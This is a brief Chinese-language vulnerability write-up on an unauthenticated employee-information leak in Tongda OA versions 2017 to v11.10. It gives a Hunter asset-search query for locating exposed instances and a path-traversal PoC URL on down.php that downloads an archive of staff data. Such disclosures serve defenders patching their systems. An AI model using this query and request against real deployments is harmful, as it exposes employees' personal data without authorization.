一、漏洞简介 通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 未授权员工信息泄露漏洞。 二、影响版本 ● 通达OA2017-v11.10 三、资产测绘 ● hunter:app.name="通达 OA" ● 登录页面 四、漏洞复现 通过poc下载文件 /inc/package/down.php?id=../../../cache/org 解压后即可看到员工信息